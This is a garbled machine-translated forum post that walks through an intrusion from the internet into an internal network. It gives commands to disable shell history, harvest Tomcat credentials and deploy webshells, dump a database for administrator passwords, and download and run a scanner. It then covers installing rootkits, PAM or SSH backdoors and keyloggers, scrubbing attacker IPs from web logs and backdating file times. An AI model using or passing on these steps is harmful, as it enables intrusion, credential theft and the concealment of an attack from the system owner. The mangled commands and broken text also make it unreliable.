[Original] One penetration test process-from Internet to Intranet

The Intranet permission has been lost recently. You need to find the Internet entry and enter the Intranet again,
I scanned the weak password with the dictionary generated by the Phoenix scanner. I checked some web pages in section C, scanned the port, and found that a wingsoft software was run on the machine 13, A vulnerability was found on wooyun, and an external shell was obtained using the st2-005 vulnerability.

0x02 Access the boundary Server

Run unset history histfile histsave histzone history histlog; export histfile =/dev/NULL; export histsize = 0; export histfilesize = 0

Copy code

So that the system does not record our operation records
The default tool does not go to webshell. After reading the web directory, chmod 777 + R/JS/adds the writeable permission and still does not go to webshell. wget-O/web/JS/help is used. JSP www.xxx.com/shell.txt cannot write files either.

Run

1. Locate tomcat-user.xml
2. CAT/mulu/tomcat-user.xml

Copy code

After finding the password, go to the Tomcat background, deploy the war package to get webshell, deploy several webshells in one sentence, modify the File Creation Time, and start to collect information on webshell, preparing for Intranet penetration

Netstat-tlnp // view the ports connected to the Intranet

10.19.1.56

10.19.1.66
192.168.1.184

10.19.1.150

10.22.1.222

10.22.1.249

[Size = 14.399999618530273px] 10.22.1.249

Double configuration file. Connect to the database in the 10.48.14.52 CIDR Block and drag the trousers out. Search for the Administrator's password and go to the three administrators (* Chen, Liu *, Peng *) to record the password.

1. Python-H
2. NMAP-H found a python environment in the environment

Copy code

When insightscan. py is used to scan the scanner, an error is reported (). Upload the Phoenix scanner to add some permissions. If an upload error occurs, you can download the file to install the Phoenix scanner.

1. Wget-O/tmp/xx.zip http://www.baidu.com/xx.zip
2. Unzip/tmp/xx.zip
3. Chmod 777 FF
4. ./FF

Copy code

Message about missing dynamic connection pants (tmux: Error while loading shared libraries: libevent-1.4.so.2: cannot open shared object file: no such file or directory
) Baidu

There are two common causes. One is that the operating system does not contain the Shared Library (lib *. so. * file) or the version of the shared library is incorrect. In this case, download and install it online. another reason is that the shared library has been installed, but when you execute the program that needs to call the shared library, the program cannot find the shared library file according to the default shared library path. reference connection: http://www.jb51.net/article/35383.htm0x03 permission maintenance (1) install rootkit installed application-level rootkit, basically is an encrypted NC, configure the port root and password can be (2) install the PAM backdoor to record the root password. The local root password is required. If/etc/shadow cannot be decrypted, you can install the PAM backdoor or SSH backdoor to record the root password.

1. Obtain the PAM version: rpm-Qa | grep Pam

Copy code reference: http://www.freebuf.com/articles/system/24104.htmlhttp://www.nxadmin.com/system/1199.html

 

(3) install keylogerhttps: // github.com/dorneanu/ixkeylog/0x04 to clear logs

 

(1) web log cleanup

1. Awk '! /123.123.123.123 | 111.111.111.111 | phpspy. php/'/var/log/httpd/access_log> temp & mv temp/var/log/httpd/access_log

1. The Touch-AMT 200901231532 file name changes the time back.
2. Of course, there are also tips for batch modification.
3. Ls | xargs touch-AMT 200901231532 # The time can be changed directly.

(2) clearing system logs

[Original] One penetration test process-from Internet to Intranet